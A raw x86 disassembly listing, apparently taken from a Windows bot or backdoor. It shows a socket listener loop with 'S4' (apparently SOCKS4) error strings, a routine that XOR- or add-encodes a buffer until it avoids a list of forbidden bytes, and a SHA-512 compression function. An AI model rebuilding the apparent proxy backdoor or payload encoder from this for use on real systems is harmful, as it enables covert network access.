loc_414566: ; CODE XREF: sub_414446+FAj
mov [esp+540h+var_403], 5Ah
call sub_407F20
add esp, 0Ch
push ebx
push 8
lea eax, [esp+53Ch+var_404]
push eax
push esi
call ds:dword_41D228 ; send
push esi
push edi
call sub_414337
pop ecx
pop ecx
loc_414591: ; CODE XREF: sub_414446+4Fj
; sub_414446+6Cj ...
push esi
call ds:dword_41D280 ; closesocket
call ds:dword_41D0DC ; GetCurrentThreadId
push eax
call sub_41481E
pop ecx
mov ecx, [esp+540h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402ADC
mov esp, ebp
pop ebp
retn 4
sub_414446 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4145BE proc near ; DATA XREF: sub_401E4D+139o
var_130 = byte ptr -130h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_14 = dword ptr -14h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_10 = byte ptr 18h
arg_20 = byte ptr 28h
arg_120 = dword ptr 128h
arg_12C = byte ptr 134h
arg_13C = dword ptr 144h
arg_144 = dword ptr 14Ch
arg_14C = dword ptr 154h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push 0FFFFFFFFh
push offset loc_41C9D1
mov eax, large fs:0
push eax
sub esp, 14Ch
mov eax, dword_423064
xor eax, esp
mov [esp+158h+var_14], eax
push esi
push edi
mov eax, dword_423064
xor eax, esp
push eax
lea eax, [esp+164h+var_C]
mov large fs:0, eax
mov esi, [ebp+arg_0]
mov [esp+164h+var_24], 0
xor eax, eax
lea edi, [esp+164h+var_23]
stosd
stosd
stosd
push 41h
pop ecx
stosw
push 6
stosb
push 1
lea edi, [esp+16Ch+var_130]
push 2
rep movsd
call ds:dword_41D220 ; socket
push [esp+0Ch+arg_120]
mov dword_428648, eax
mov word ptr [esp+10h+arg_0], 2
call ds:dword_41D270 ; htons
and [esp+0Ch+arg_4], 0
mov word ptr [esp+0Ch+arg_0+2], ax
push 10h
lea eax, [esp+10h+arg_0]
push eax
push dword_428648
call ds:dword_41D27C ; bind
test eax, eax
jge short loc_41466D
push offset aS4BindError ; "S4: bind() Error"
jmp short loc_414684
; ---------------------------------------------------------------------------
loc_41466D: ; CODE XREF: sub_4145BE+A6j
push 0Ah
push dword_428648
call ds:dword_41D230 ; listen
test eax, eax
jge short loc_4146D1
push offset aS4ListenError ; "S4: listen() Error"
loc_414684: ; CODE XREF: sub_4145BE+ADj
lea eax, [esp+10h+arg_20]
push eax
push [esp+14h+arg_120+2]
push offset dword_42851C
call sub_417B51
add esp, 10h
call ds:dword_41D0DC ; GetCurrentThreadId
push eax
call sub_41481E
pop ecx
xor eax, eax
mov ecx, [esp+0Ch+arg_144]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
mov ecx, [esp+arg_13C]
xor ecx, esp
call sub_402ADC
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_4146D1: ; CODE XREF: sub_4145BE+BFj
push dword_42851C
lea esi, [esp+10h+arg_12C]
push 10h
pop ecx
call sub_4197F4
movsx eax, word ptr [esp+10h+arg_120]
pop ecx
push eax
mov eax, esi
push eax
push offset aS4SI ; "S4: %s:%i"
lea eax, [esp+18h+arg_20]
push eax
push [esp+1Ch+arg_120+2]
push offset dword_42851C
call sub_417B51
add esp, 18h
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
loc_414719: ; CODE XREF: sub_4145BE+1A3j
push 0
lea eax, [esp+10h+arg_10]
push eax
push dword_428648
call ds:dword_41D234 ; accept
push 8
mov edi, eax
call sub_403417
mov esi, eax
pop ecx
mov [esp+10h], esi
and [esp+0Ch+arg_14C], 0
test esi, esi
jz short loc_414759
mov ecx, edi
push offset sub_414446
mov edi, offset aSc ; "SC"
call sub_414887
loc_414759: ; CODE XREF: sub_4145BE+188j
or [esp+0Ch+arg_14C], 0FFFFFFFFh
jmp short loc_414719
sub_4145BE endp
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41476B proc near ; CODE XREF: sub_4147FF+12p
; sub_41481E+5Dp
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, dword_4357BC
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_4357B8
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_41478C: ; CODE XREF: sub_41476B+4Cj
mov eax, dword_4357BC
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_4147F4
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_4147B9
call sub_40168C
jmp short loc_41478C
; ---------------------------------------------------------------------------
loc_4147B9: ; CODE XREF: sub_41476B+45j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, dword_4357BC
jz short loc_4147F4
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax
mov [ecx+4], edx
call sub_403339
dec dword_4357C0
pop ecx
loc_4147F4: ; CODE XREF: sub_41476B+36j
; sub_41476B+6Bj
push ebx
call sub_403339
pop ecx
pop edi
pop esi
leave
retn
sub_41476B endp
; =============== S U B R O U T I N E =======================================
sub_4147FF proc near ; CODE XREF: sub_401FDA+77p
; sub_402800+7Cp ...
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:off_41D094
test eax, eax
jz short loc_41481A
call sub_41476B
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41481A: ; CODE XREF: sub_4147FF+10j
xor al, al
pop ebx
retn
sub_4147FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41481E proc near ; CODE XREF: sub_414446+159p
; sub_4145BE+E6p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, dword_4357BC
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_4357B8
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414842: ; CODE XREF: sub_41481E+54j
mov eax, dword_4357BC
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_414880
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414874
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_414842
; ---------------------------------------------------------------------------
loc_414874: ; CODE XREF: sub_41481E+49j
call sub_40164F
mov ebx, [eax]
call sub_41476B
loc_414880: ; CODE XREF: sub_41481E+3Cj
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41481E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414887 proc near ; CODE XREF: sub_40177B+246p
; sub_4019F3+1F8p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:off_41D090
test eax, eax
mov [esi+4], eax
jz short loc_4148E0
push edi
lea eax, [ebp+var_4B]
push 38h
push eax
call sub_402EBA
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, dword_4357BC
push eax
mov ecx, offset dword_4357B8
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_4148E0: ; CODE XREF: sub_414887+27j
push 1
push dword ptr [esi+4]
call ds:off_41D07C
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402ADC
leave
retn 4
sub_414887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148FB proc near ; CODE XREF: sub_41AFF3+4A3p
; sub_41AFF3+4B1p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push ebx
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414A21
mov eax, [ebp+arg_4]
lea ecx, [eax+18h]
and eax, 80000001h
mov [ebp+arg_0], ecx
jns short loc_41492B
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41492B: ; CODE XREF: sub_4148FB+29j
jz short loc_414931
mov [ebp+var_1], 1
loc_414931: ; CODE XREF: sub_4148FB:loc_41492Bj
mov eax, 172h
cmp ecx, eax
jle short loc_414944
cmp [ebp+var_1], 1
jnz loc_414B15
loc_414944: ; CODE XREF: sub_4148FB+3Dj
inc ecx
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414956
cmp [ebp+var_1], 1
jz loc_414B15
loc_414956: ; CODE XREF: sub_4148FB+4Fj
mov ebx, offset byte_435638
jmp short loc_414962
; ---------------------------------------------------------------------------
loc_41495D: ; CODE XREF: sub_4148FB+F7j
mov eax, 172h
loc_414962: ; CODE XREF: sub_4148FB+60j
inc [ebp+var_2]
and [ebp+var_8], 0
push eax
push 0
push ebx
call sub_407F20
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_425A7C
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_4], edi
mov byte_435646, cl
mov byte_43564A, cl
jle short loc_4149B1
loc_414997: ; CODE XREF: sub_4148FB+B4j
mov esi, [ebp+var_8]
mov al, byte_4354C0[esi]
add al, cl
mov byte_435650[esi], al
inc esi
cmp esi, [ebp+arg_4]
mov [ebp+var_8], esi
jl short loc_414997
loc_4149B1: ; CODE XREF: sub_4148FB+9Aj
cmp [ebp+var_1], 1
jnz short loc_4149C0
mov eax, [ebp+var_8]
mov byte_435650[eax], cl
loc_4149C0: ; CODE XREF: sub_4148FB+BAj
cmp [ebp+arg_0], edi
mov al, 1
jle short loc_4149FD
loc_4149C7: ; CODE XREF: sub_4148FB+EEj
mov dl, byte_435638[edi]
xor esi, esi
loc_4149CF: ; CODE XREF: sub_4148FB+E0j
cmp dl, byte_4257F4[esi]
jz short loc_4149DF
inc esi
cmp esi, 8
jl short loc_4149CF
jmp short loc_4149E1
; ---------------------------------------------------------------------------
loc_4149DF: ; CODE XREF: sub_4148FB+DAj
xor al, al
loc_4149E1: ; CODE XREF: sub_4148FB+E2j
test al, al
jz short loc_4149EB
inc edi
cmp edi, [ebp+arg_0]
jl short loc_4149C7
loc_4149EB: ; CODE XREF: sub_4148FB+E8j
cmp al, 1
jz short loc_4149FD
cmp cl, 0FFh
jb loc_41495D
jmp loc_414B15
; ---------------------------------------------------------------------------
loc_4149FD: ; CODE XREF: sub_4148FB+CAj
; sub_4148FB+F2j ...
cmp [ebp+var_1], 1
jnz short loc_414A0C
mov eax, [ebp+var_C]
inc [ebp+arg_4]
mov [ebp+arg_0], eax
loc_414A0C: ; CODE XREF: sub_4148FB+106j
mov eax, [ebp+arg_4]
cdq
sub eax, edx
sar eax, 1
mov byte_43563B, al
mov eax, [ebp+arg_0]
jmp loc_414B17
; ---------------------------------------------------------------------------
loc_414A21: ; CODE XREF: sub_4148FB+15j
cmp [ebp+arg_0], 2
jnz loc_414B15
mov eax, [ebp+arg_4]
lea ecx, [eax+18h]
and eax, 80000001h
mov [ebp+arg_0], ecx
jns short loc_414A40
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414A40: ; CODE XREF: sub_4148FB+13Ej
jz short loc_414A46
mov [ebp+var_1], 1
loc_414A46: ; CODE XREF: sub_4148FB:loc_414A40j
mov eax, 172h
cmp ecx, eax
jle short loc_414A59
cmp [ebp+var_1], 1
jnz loc_414B15
loc_414A59: ; CODE XREF: sub_4148FB+152j
inc ecx
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414A6B
cmp [ebp+var_1], 1
jz loc_414B15
loc_414A6B: ; CODE XREF: sub_4148FB+164j
mov ebx, offset byte_435638
jmp short loc_414A77
; ---------------------------------------------------------------------------
loc_414A72: ; CODE XREF: sub_4148FB+214j
mov eax, 172h
loc_414A77: ; CODE XREF: sub_4148FB+175j
inc [ebp+var_2]
and [ebp+var_8], 0
push eax
push 0
push ebx
call sub_407F20
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_425A98
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_4], edi
mov byte_435646, cl
mov byte_43564A, cl
jle short loc_414AC6
loc_414AAC: ; CODE XREF: sub_4148FB+1C9j
mov esi, [ebp+var_8]
mov al, byte_4354C0[esi]
xor al, cl
mov byte_435650[esi], al
inc esi
cmp esi, [ebp+arg_4]
mov [ebp+var_8], esi
jl short loc_414AAC
loc_414AC6: ; CODE XREF: sub_4148FB+1AFj
cmp [ebp+var_1], 1
jnz short loc_414AD5
mov eax, [ebp+var_8]
mov byte_435650[eax], cl
loc_414AD5: ; CODE XREF: sub_4148FB+1CFj
cmp [ebp+arg_0], edi
mov al, 1
jle loc_4149FD
loc_414AE0: ; CODE XREF: sub_4148FB+207j
mov dl, byte_435638[edi]
xor esi, esi
loc_414AE8: ; CODE XREF: sub_4148FB+1F9j
cmp dl, byte_4257F4[esi]
jz short loc_414AF8
inc esi
cmp esi, 8
jl short loc_414AE8
jmp short loc_414AFA
; ---------------------------------------------------------------------------
loc_414AF8: ; CODE XREF: sub_4148FB+1F3j
xor al, al
loc_414AFA: ; CODE XREF: sub_4148FB+1FBj
test al, al
jz short loc_414B04
inc edi
cmp edi, [ebp+arg_0]
jl short loc_414AE0
loc_414B04: ; CODE XREF: sub_4148FB+201j
cmp al, 1
jz loc_4149FD
cmp cl, 0FFh
jb loc_414A72
loc_414B15: ; CODE XREF: sub_4148FB+43j
; sub_4148FB+55j ...
xor eax, eax
loc_414B17: ; CODE XREF: sub_4148FB+121j
pop edi
pop esi
pop ebx
leave
retn
sub_4148FB endp
; =============== S U B R O U T I N E =======================================
sub_414B1C proc near ; CODE XREF: sub_41AFF3+490p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
mov eax, ebp
lea edx, [eax+1]
loc_414B27: ; CODE XREF: sub_414B1C+10j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414B27
sub eax, edx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414B85
push esi
push edi
push ebx
push 0
push offset byte_4354C0
call sub_407F20
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_425AB8
mov edi, offset byte_4354C0
rep movsd
movsw
mov eax, ebp
movsb
lea esi, [eax+1]
loc_414B67: ; CODE XREF: sub_414B1C+50j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414B67
sub eax, esi
push eax
push ebp
push offset word_43558A
call sub_407FA0
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414B87
; ---------------------------------------------------------------------------
loc_414B85: ; CODE XREF: sub_414B1C+20j
xor eax, eax
loc_414B87: ; CODE XREF: sub_414B1C+67j
pop ebp
pop ebx
retn
sub_414B1C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414B90 proc near ; CODE XREF: sub_41BDFF+64p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset byte_41FEF8
rep movsd
pop edi
pop esi
retn
sub_414B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414BC0 proc near ; CODE XREF: sub_4172D0+BEp
; sub_4172D0+13Bp ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_414D5E
; ---------------------------------------------------------------------------
align 10h
loc_414D50: ; CODE XREF: sub_414BC0+2680j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_414D5E: ; CODE XREF: sub_414BC0+18Aj
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414E48
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_414E5E
; ---------------------------------------------------------------------------
loc_414E48: ; CODE XREF: sub_414BC0+1A8j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_414E5E: ; CODE XREF: sub_414BC0+286j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F9F8[eax*8]
adc edi, ds:dword_41F9FC[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415074
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_415083
; ---------------------------------------------------------------------------
loc_415074: ; CODE XREF: sub_414BC0+3D5j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_415083: ; CODE XREF: sub_414BC0+4B2j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA00[eax*8]
adc esi, ds:dword_41FA04[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
